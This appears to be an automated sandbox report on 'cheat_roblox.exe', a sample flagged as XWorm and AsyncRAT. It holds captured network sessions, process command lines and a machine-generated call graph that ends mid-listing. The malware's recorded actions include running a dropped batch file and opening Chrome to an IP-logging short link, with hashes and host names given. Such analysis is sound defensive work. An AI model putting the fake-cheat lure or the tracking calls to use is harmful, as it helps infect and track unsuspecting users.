                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                Cookie: FTID=1cg1nj32dger1cg1nj00367b; VID=2DNPIG0nbdur1cg1nk003HAo
                                                                                                                2024-07-29 22:49:20 UTC | 459 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.17.9
                                                                                                                Date: Mon, 29 Jul 2024 22:49:20 GMT
                                                                                                                Content-Type: image/gif
                                                                                                                Content-Length: 445
                                                                                                                Connection: close
                                                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                                                Pragma: no-cache
                                                                                                                Cache-control: no-cache
                                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                                Set-Cookie: FTID=0; path=/; expires=Sat, 01 Jan 2000 00:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Strict-Transport-Security: max-age=86400


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                10 | 192.168.2.9 | 49746 | 104.21.4.208 | 443 | 5364 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-07-29 22:49:20 UTC | 351 | OUT | GET /favicon.ico HTTP/1.1
                                                                                                                Host: cdn.iplogger.org
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-07-29 22:49:20 UTC | 753 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Mon, 29 Jul 2024 22:49:20 GMT
                                                                                                                Content-Type: image/x-icon
                                                                                                                Content-Length: 2833
                                                                                                                Connection: close
                                                                                                                last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                                etag: "629f3a26-b11"
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                Cache-Control: max-age=14400
                                                                                                                CF-Cache-Status: HIT
                                                                                                                Age: 6038
                                                                                                                Accept-Ranges: bytes
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gg02hedGd65nqLSX8kn35HnUlrkQE4NFTWiaws6euWErw%2F1nJDBB6mKmLdxgnE45ETPQFJrRXBDeeJWg3W3yCfRy%2BtOBtjpGLHqXr7tXuF7u2T2ydigZtOarNddWytVXzDGJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ab0a95dc93c43b1-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                11 | 192.168.2.9 | 49745 | 184.28.90.27 | 443 | |
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-07-29 22:49:20 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                Accept-Encoding: identity
                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                Host: fs.microsoft.com
                                                                                                                2024-07-29 22:49:20 UTC | 467 | IN | HTTP/1.1 200 OK
                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                Content-Type: application/octet-stream
                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                Server: ECAcc (chd/073B)
                                                                                                                X-CID: 11
                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                X-Ms-Region: prod-eus-z1
                                                                                                                Cache-Control: public, max-age=202425
                                                                                                                Date: Mon, 29 Jul 2024 22:49:20 GMT
                                                                                                                Connection: close
                                                                                                                X-CID: 2


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                12 | 192.168.2.9 | 49747 | 184.28.90.27 | 443 | |
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-07-29 22:49:21 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                Accept-Encoding: identity
                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                Range: bytes=0-2147483646
                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                Host: fs.microsoft.com
                                                                                                                2024-07-29 22:49:21 UTC | 515 | IN | HTTP/1.1 200 OK
                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                Content-Type: application/octet-stream
                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                                X-CID: 11
                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                                Cache-Control: public, max-age=202467
                                                                                                                Date: Mon, 29 Jul 2024 22:49:21 GMT
                                                                                                                Content-Length: 55
                                                                                                                Connection: close
                                                                                                                X-CID: 2
2024-07-29 22:49:21 UTC | 55 | IN | Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.9 | 61119 | 20.3.187.198 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:49:34 UTC | 142 | OUT | GET /clientwebservice/ping HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: DNS resiliency checker/1.0
                                                                                                                Host: fe3cr.delivery.mp.microsoft.com
2024-07-29 22:49:35 UTC | 234 | IN | HTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Expires: -1
                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                X-Powered-By: ASP.NET
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Mon, 29 Jul 2024 22:49:34 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.9 | 61121 | 52.165.165.26 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:49:38 UTC | 124 | OUT | GET /sls/ping HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: DNS resiliency checker/1.0
                                                                                                                Host: slscr.update.microsoft.com
2024-07-29 22:49:38 UTC | 318 | IN | HTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Expires: -1
                                                                                                                MS-CV: N9wrgWCZWUK0l8Do.0
                                                                                                                MS-RequestId: 65af64a9-fafb-4bdd-9aea-685a5d85697a
                                                                                                                MS-CorrelationId: 10bc97bb-1c4f-47da-b96b-ca49aa1cbd3e
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Mon, 29 Jul 2024 22:49:38 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 61122 | 40.127.169.103 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:49:40 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vWUpoG9ux8uKoBS&MD=+k9WfbGS HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                Host: slscr.update.microsoft.com
2024-07-29 22:49:41 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Expires: -1
                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                MS-CorrelationId: e192b5ee-83f6-4b4e-bed4-21e5c9f365d6
                                                                                                                MS-RequestId: 0ef5a365-b3b2-4c6b-8e18-659bab1f9471
                                                                                                                MS-CV: xQYACvxTi06B+S3z.0
                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Mon, 29 Jul 2024 22:49:40 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 24490


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 61123 | 40.127.169.103 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:49:42 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vWUpoG9ux8uKoBS&MD=+k9WfbGS HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                Host: slscr.update.microsoft.com
2024-07-29 22:49:42 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Expires: -1
                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                MS-CorrelationId: 7b4ebea3-22b8-4b52-bedc-35b547b8898f
                                                                                                                MS-RequestId: 29373da9-d71f-461b-a498-259ad73ecc9e
                                                                                                                MS-CV: /FFJZc7u0ECKjf+S.0
                                                                                                                X-Microsoft-SLSClientCache: 1440
                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Mon, 29 Jul 2024 22:49:41 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 30005


                                                                                                                Target ID:0
                                                                                                                Start time:18:48:58
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user\Desktop\cheat_roblox.exe"
                                                                                                                Imagebase:0x7ff6e7e10000
                                                                                                                File size:2'675'335 bytes
                                                                                                                MD5 hash:D49B1A211CE49BED3E766471501819C6
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:18:48:59
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
                                                                                                                Imagebase:0x7ff7c8fd0000
                                                                                                                File size:289'792 bytes
                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:18:48:59
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:4
                                                                                                                Start time:18:48:59
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe"
                                                                                                                Imagebase:0xdf0000
                                                                                                                File size:5'720'984 bytes
                                                                                                                MD5 hash:27469372591B14FF1C57654FACB5E020
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:5
                                                                                                                Start time:18:49:09
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:cmd
                                                                                                                Imagebase:0x7ff7c8fd0000
                                                                                                                File size:289'792 bytes
                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:6
                                                                                                                Start time:18:49:09
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:8
                                                                                                                Start time:18:49:10
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
                                                                                                                Imagebase:0x7ff6b2cb0000
                                                                                                                File size:3'242'272 bytes
                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:10
                                                                                                                Start time:18:49:12
                                                                                                                Start date:29/07/2024
                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,10681821834965854716,2612252034697891369,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                Imagebase:0x7ff6b2cb0000
                                                                                                                File size:3'242'272 bytes
                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:12.1%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:27%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:23
_invalid_parameter_noinfo_noreturn 31 API calls 27084->27085 27085->27079 27086->27074 27088 7ff6e7e23e28 swprintf 46 API calls 27087->27088 27089 7ff6e7e295eb 27088->27089 27090 7ff6e7e30f68 WideCharToMultiByte 27089->27090 27091 7ff6e7e29603 27090->27091 27092 7ff6e7e29800 31 API calls 27091->27092 27093 7ff6e7e2961b 27092->27093 27094 7ff6e7e42320 _handle_error 8 API calls 27093->27094 27095 7ff6e7e2962b 27094->27095 27095->27055 27095->27067 27097 7ff6e7e113a4 33 API calls 27096->27097 27098 7ff6e7e12462 GetWindowTextW 27097->27098 27099 7ff6e7e12494 27098->27099 27100 7ff6e7e1129c 33 API calls 27099->27100 27101 7ff6e7e124a2 27100->27101 27102 7ff6e7e124dd 27101->27102 27104 7ff6e7e12505 27101->27104 27103 7ff6e7e42320 _handle_error 8 API calls 27102->27103 27105 7ff6e7e124f3 27103->27105 27106 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27104->27106 27105->26747 27107 7ff6e7e1250a 27106->27107 27108->26764 27110->26772 27112 7ff6e7e3ae3c GetMessageW 27111->27112 27113 7ff6e7e3ae80 GetDlgItem 27111->27113 27114 7ff6e7e3ae5b IsDialogMessageW 27112->27114 27115 7ff6e7e3ae6a TranslateMessage DispatchMessageW 27112->27115 27113->26783 27113->26784 27114->27113 27114->27115 27115->27113 27118 7ff6e7e236b3 27116->27118 27117 7ff6e7e236e0 27119 7ff6e7e232bc 51 API calls 27117->27119 27118->27117 27120 7ff6e7e236cc CreateDirectoryW 27118->27120 27121 7ff6e7e236ee 27119->27121 27120->27117 27122 7ff6e7e2377d 27120->27122 27123 7ff6e7e23791 GetLastError 27121->27123 27125 7ff6e7e26a0c 49 API calls 27121->27125 27124 7ff6e7e2378d 27122->27124 27136 7ff6e7e23d34 27122->27136 27123->27124 27127 7ff6e7e42320 _handle_error 8 API calls 27124->27127 27128 7ff6e7e2371c 27125->27128 27129 7ff6e7e237b9 27127->27129 27130 7ff6e7e2373b 27128->27130 27131 7ff6e7e23720 CreateDirectoryW 27128->27131 27129->26802 27132 7ff6e7e23774 27130->27132 27133 7ff6e7e237ce 27130->27133 27131->27130 27132->27122 27132->27123 27134 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 
31 API calls 27133->27134 27135 7ff6e7e237d3 27134->27135 27137 7ff6e7e23d5b 27136->27137 27138 7ff6e7e23d5e SetFileAttributesW 27136->27138 27137->27138 27139 7ff6e7e23d74 27138->27139 27146 7ff6e7e23df5 27138->27146 27140 7ff6e7e26a0c 49 API calls 27139->27140 27142 7ff6e7e23d99 27140->27142 27141 7ff6e7e42320 _handle_error 8 API calls 27143 7ff6e7e23e0a 27141->27143 27144 7ff6e7e23d9d SetFileAttributesW 27142->27144 27145 7ff6e7e23dbc 27142->27145 27143->27124 27144->27145 27145->27146 27147 7ff6e7e23e1a 27145->27147 27146->27141 27148 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27147->27148 27149 7ff6e7e23e1f 27148->27149 27151 7ff6e7e17206 27150->27151 27152 7ff6e7e1713b 27150->27152 27160 7ff6e7e1704c 47 API calls BuildCatchObjectHelperInternal 27151->27160 27158 7ff6e7e1714b BuildCatchObjectHelperInternal 27152->27158 27159 7ff6e7e13f48 33 API calls 2 library calls 27152->27159 27155 7ff6e7e1720b 27156 7ff6e7e17273 27155->27156 27161 7ff6e7e1889c 8 API calls BuildCatchObjectHelperInternal 27155->27161 27156->26818 27158->26818 27159->27158 27160->27155 27161->27155 27163 7ff6e7e3aa2f 27162->27163 27164 7ff6e7e3aa36 27162->27164 27163->26927 27164->27163 27294 7ff6e7e11744 33 API calls 4 library calls 27164->27294 27166->26927 27168 7ff6e7e3a47f 27167->27168 27189 7ff6e7e3a706 27167->27189 27295 7ff6e7e3cdf8 33 API calls 27168->27295 27170 7ff6e7e42320 _handle_error 8 API calls 27172 7ff6e7e3a717 27170->27172 27171 7ff6e7e3a49e 27173 7ff6e7e1129c 33 API calls 27171->27173 27172->26913 27174 7ff6e7e3a4de 27173->27174 27175 7ff6e7e1129c 33 API calls 27174->27175 27176 7ff6e7e3a517 27175->27176 27177 7ff6e7e1129c 33 API calls 27176->27177 27178 7ff6e7e3a54a 27177->27178 27296 7ff6e7e3a834 33 API calls _invalid_parameter_noinfo_noreturn 27178->27296 27180 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27181 7ff6e7e3a73a 27180->27181 27182 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27181->27182 27184 7ff6e7e3a740 
27182->27184 27183 7ff6e7e3a573 27183->27181 27183->27184 27185 7ff6e7e3a685 27183->27185 27187 7ff6e7e120b0 33 API calls 27183->27187 27195 7ff6e7e3a734 27183->27195 27186 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27184->27186 27188 7ff6e7e3a746 27185->27188 27185->27189 27190 7ff6e7e3a72f 27185->27190 27186->27188 27187->27185 27191 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27188->27191 27189->27170 27193 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27190->27193 27192 7ff6e7e3a74c 27191->27192 27194 7ff6e7e1255c 61 API calls 27192->27194 27193->27195 27196 7ff6e7e3a795 27194->27196 27195->27180 27197 7ff6e7e3a7b1 27196->27197 27198 7ff6e7e3a801 SetDlgItemTextW 27196->27198 27201 7ff6e7e3a7a1 27196->27201 27199 7ff6e7e42320 _handle_error 8 API calls 27197->27199 27198->27197 27200 7ff6e7e3a827 27199->27200 27200->26913 27201->27197 27204 7ff6e7e3a7ad 27201->27204 27297 7ff6e7e2bb00 102 API calls 27201->27297 27202 7ff6e7e3a7b7 EndDialog 27202->27197 27204->27197 27204->27202 27210 7ff6e7e3f529 __scrt_get_show_window_mode 27205->27210 27223 7ff6e7e3f87d 27205->27223 27206 7ff6e7e11fa0 31 API calls 27207 7ff6e7e3f89c 27206->27207 27208 7ff6e7e42320 _handle_error 8 API calls 27207->27208 27209 7ff6e7e3f8a8 27208->27209 27209->26905 27211 7ff6e7e3f684 27210->27211 27298 7ff6e7e313c4 CompareStringW 27210->27298 27213 7ff6e7e1129c 33 API calls 27211->27213 27214 7ff6e7e3f6c0 27213->27214 27215 7ff6e7e232a8 51 API calls 27214->27215 27216 7ff6e7e3f6ca 27215->27216 27217 7ff6e7e11fa0 31 API calls 27216->27217 27220 7ff6e7e3f6d5 27217->27220 27218 7ff6e7e3f742 ShellExecuteExW 27219 7ff6e7e3f846 27218->27219 27225 7ff6e7e3f755 27218->27225 27219->27223 27227 7ff6e7e3f8fb 27219->27227 27220->27218 27222 7ff6e7e1129c 33 API calls 27220->27222 27221 7ff6e7e3f78e 27300 7ff6e7e3fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27221->27300 27226 7ff6e7e3f717 27222->27226 27223->27206 27224 
7ff6e7e3f7e3 CloseHandle 27230 7ff6e7e3f7f2 27224->27230 27236 7ff6e7e3f801 27224->27236 27225->27221 27225->27224 27232 7ff6e7e3f781 ShowWindow 27225->27232 27299 7ff6e7e25b60 53 API calls 2 library calls 27226->27299 27229 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27227->27229 27235 7ff6e7e3f900 27229->27235 27301 7ff6e7e313c4 CompareStringW 27230->27301 27232->27221 27234 7ff6e7e3f725 27238 7ff6e7e11fa0 31 API calls 27234->27238 27236->27219 27239 7ff6e7e3f837 ShowWindow 27236->27239 27237 7ff6e7e3f7a6 27237->27224 27241 7ff6e7e3f7b4 GetExitCodeProcess 27237->27241 27240 7ff6e7e3f72f 27238->27240 27239->27219 27240->27218 27241->27224 27242 7ff6e7e3f7c7 27241->27242 27242->27224 27243->26927 27244->26927 27245->26927 27246->26927 27247->26927 27248->26927 27249->26927 27250->26927 27251->26927 27252->26927 27254 7ff6e7e272ea 27253->27254 27302 7ff6e7e1b3a8 27254->27302 27257->26927 27259 7ff6e7e231e7 DeleteFileW 27258->27259 27260 7ff6e7e231e4 27258->27260 27261 7ff6e7e231fd 27259->27261 27268 7ff6e7e2327c 27259->27268 27260->27259 27262 7ff6e7e26a0c 49 API calls 27261->27262 27264 7ff6e7e23222 27262->27264 27263 7ff6e7e42320 _handle_error 8 API calls 27265 7ff6e7e23291 27263->27265 27266 7ff6e7e23226 DeleteFileW 27264->27266 27267 7ff6e7e23243 27264->27267 27265->26927 27266->27267 27267->27268 27269 7ff6e7e232a1 27267->27269 27268->27263 27270 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27269->27270 27271 7ff6e7e232a6 27270->27271 27273->26927 27274->26927 27275->26927 27276->26927 27277->26927 27278->26927 27280 7ff6e7e2d25e 27279->27280 27281 7ff6e7e2d292 27280->27281 27282 7ff6e7e11744 33 API calls 27280->27282 27281->26973 27282->27280 27283->26873 27284->26861 27286->26843 27287->26846 27288->26848 27289->26928 27290->26889 27292->26891 27294->27164 27295->27171 27296->27183 27297->27204 27298->27211 27299->27234 27300->27237 27301->27236 27305 7ff6e7e1b3f2 __scrt_get_show_window_mode 27302->27305 27303 7ff6e7e42320 
_handle_error 8 API calls 27304 7ff6e7e1b4b6 27303->27304 27304->26927 27305->27303 27362 7ff6e7e286ec 27306->27362 27308 7ff6e7e1e3c4 27368 7ff6e7e1e600 27308->27368 27310 7ff6e7e1e454 27312 7ff6e7e1e549 27310->27312 27314 7ff6e7e1e4d4 27310->27314 27311 7ff6e7e421d0 33 API calls 27315 7ff6e7e1e4f0 27311->27315 27313 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27312->27313 27323 7ff6e7e1e54e 27313->27323 27314->27311 27374 7ff6e7e33148 102 API calls 27315->27374 27317 7ff6e7e1e51d 27318 7ff6e7e42320 _handle_error 8 API calls 27317->27318 27320 7ff6e7e1e52d 27318->27320 27319 7ff6e7e218c2 27321 7ff6e7e2190d 27319->27321 27324 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27319->27324 27320->26992 27321->26992 27322 7ff6e7e11fa0 31 API calls 27322->27323 27323->27319 27323->27321 27323->27322 27325 7ff6e7e2193b 27324->27325 27327 7ff6e7e1e7ea 27326->27327 27328 7ff6e7e1e864 27327->27328 27330 7ff6e7e1e8a1 27327->27330 27375 7ff6e7e23ec8 27327->27375 27328->27330 27331 7ff6e7e1e993 27328->27331 27337 7ff6e7e1e900 27330->27337 27382 7ff6e7e1f578 27330->27382 27332 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27331->27332 27335 7ff6e7e1e998 27332->27335 27334 7ff6e7e42320 _handle_error 8 API calls 27336 7ff6e7e1e97e 27334->27336 27340 7ff6e7e1e578 27336->27340 27339 7ff6e7e1e955 27337->27339 27418 7ff6e7e128a4 82 API calls 2 library calls 27337->27418 27339->27334 28393 7ff6e7e215d8 27340->28393 27343 7ff6e7e1e59e 27344 7ff6e7e11fa0 31 API calls 27343->27344 27346 7ff6e7e1e5b7 27344->27346 27345 7ff6e7e31870 108 API calls 27345->27343 27347 7ff6e7e11fa0 31 API calls 27346->27347 27348 7ff6e7e1e5c3 27347->27348 27349 7ff6e7e11fa0 31 API calls 27348->27349 27350 7ff6e7e1e5cf 27349->27350 27351 7ff6e7e2878c 108 API calls 27350->27351 27352 7ff6e7e1e5db 27351->27352 27353 7ff6e7e11fa0 31 API calls 27352->27353 27354 7ff6e7e1e5e4 27353->27354 27355 7ff6e7e11fa0 31 API calls 27354->27355 27359 7ff6e7e1e5ed 27355->27359 27356 
